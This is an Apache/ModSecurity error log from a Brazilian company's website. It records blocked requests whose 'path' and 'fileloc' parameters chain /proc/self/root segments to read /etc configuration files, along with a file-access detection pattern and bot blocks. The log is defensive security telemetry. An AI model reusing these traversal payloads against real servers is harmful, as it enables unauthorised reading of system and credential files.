[Wed Mar 18 06:07:23.235729 2026] [:error] [pid 30077:tid 140411540502272] [client 74.7.241.31:44580] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abprS_u8EFLIOrSqIpvWBQAAAlg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:07:31.271557 2026] [:error] [pid 15826:tid 140411733534464] [client 74.7.228.61:45380] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abprU-oXxyEfFpUF8f88eQAAAUE"]
[Wed Mar 18 06:07:32.839304 2026] [:error] [pid 17887:tid 140411574073088] [client 74.7.244.43:35730] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abprVAkwaGbbGflqUZDg-gAAANQ"]
[Wed Mar 18 06:07:45.874381 2026] [:error] [pid 19507:tid 140411666392832] [client 74.7.241.31:59036] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abprYdY0UrI5A3LftIxnHQAAAYk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:07:49.035147 2026] [:error] [pid 15826:tid 140411658000128] [client 74.7.241.31:39230] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abprZOoXxyEfFpUF8f88kAAAAUo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:07:54.792146 2026] [:error] [pid 19507:tid 140411616036608] [client 74.7.241.31:53186] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpratY0UrI5A3LftIxnIwAAAY8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:08:45.477825 2026] [mime_magic:error] [pid 29882:tid 140411641214720] (70014)End of file found: [client 216.73.216.191:42844] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 06:09:07.387712 2026] [mime_magic:error] [pid 26799:tid 140411691570944] (70014)End of file found: [client 216.73.216.191:32894] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 06:09:11.703656 2026] [:error] [pid 17887:tid 140411590858496] [client 74.7.243.128:43692] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abprtwkwaGbbGflqUZDhNAAAANI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:09:13.072617 2026] [:error] [pid 26799:tid 140411674785536] [client 74.7.243.128:47772] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpruda6ubjKNq_cu4ZmogAAA0g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:09:18.358903 2026] [:error] [pid 15051:tid 140411624429312] [client 74.7.243.128:47788] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abprvimAPhZkrhU8w4k-2AAAAI4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:09:19.705631 2026] [:error] [pid 11816:tid 140411607643904] [client 74.7.243.128:34496] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abprv-w_le52K8_3pV2xGAAAAhA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:09:24.719544 2026] [:error] [pid 17653:tid 140411725141760] [client 74.7.243.128:34512] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abprxMdf6f5d65gmYZSi7AAAAsI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:09:33.191322 2026] [:error] [pid 17887:tid 140411582465792] [client 74.7.243.128:34518] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abprzQkwaGbbGflqUZDhQwAAANM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:09:35.915741 2026] [:error] [pid 17653:tid 140411683178240] [client 74.7.243.128:36402] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abprz8df6f5d65gmYZSi9AAAAsc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:09:57.185367 2026] [:error] [pid 19507:tid 140411666392832] [client 74.7.243.128:36404] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpr5NY0UrI5A3LftIxnfAAAAYk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:10:00.415122 2026] [mime_magic:error] [pid 29882:tid 140411658000128] (70014)End of file found: [client 216.73.216.191:45428] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 06:10:05.801988 2026] [:error] [pid 30077:tid 140411624429312] [client 74.7.241.31:53194] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpr7fu8EFLIOrSqIpvWtgAAAk4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:10:35.401450 2026] [:error] [pid 15826:tid 140411557287680] [client 74.7.241.31:41450] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpsCuoXxyEfFpUF8f89DQAAAVY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:11:22.048310 2026] [:error] [pid 19507:tid 140411565680384] [client 74.7.241.31:41438] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpsOtY0UrI5A3LftIxnzgAAAZU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:12:22.007577 2026] [:error] [pid 30077:tid 140411624429312] [client 216.73.216.191:49258] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/hostname"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpsdvu8EFLIOrSqIpvW_wAAAk4"]
[Wed Mar 18 06:12:22.239933 2026] [mime_magic:error] [pid 11816:tid 140411716749056] (70014)End of file found: [client 216.73.216.191:49272] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 06:12:23.226362 2026] [:error] [pid 17653:tid 140411624429312] [client 216.73.216.191:49294] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/host.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpsd8df6f5d65gmYZSjbQAAAs4"]
[Wed Mar 18 06:12:26.065963 2026] [:error] [pid 17653:tid 140411725141760] [client 216.73.216.191:49384] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/subuid"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpsesdf6f5d65gmYZSjcQAAAsI"]
[Wed Mar 18 06:12:31.970773 2026] [:error] [pid 26799:tid 140411649607424] [client 74.7.228.61:58730] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abpsf9a6ubjKNq_cu4ZnLgAAA0s"]
[Wed Mar 18 06:12:33.867640 2026] [:error] [pid 15826:tid 140411599251200] [client 74.7.244.43:37704] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abpsgeoXxyEfFpUF8f89QAAAAVE"]
[Wed Mar 18 06:13:04.701332 2026] [:error] [pid 17653:tid 140411658000128] [client 74.7.241.31:50352] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpsoMdf6f5d65gmYZSjnAAAAso"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 06:13:19.211914 2026] [:error] [pid 31803:tid 140411641214720] [client 74.7.241.31:54812] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpsr-yqAr6etmhZHNqMjgAAAEw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 06:13:26.537425 2026] [:error] [pid 15826:tid 140411632822016] [client 74.7.241.31:56958] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpstuoXxyEfFpUF8f89YAAAAU0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
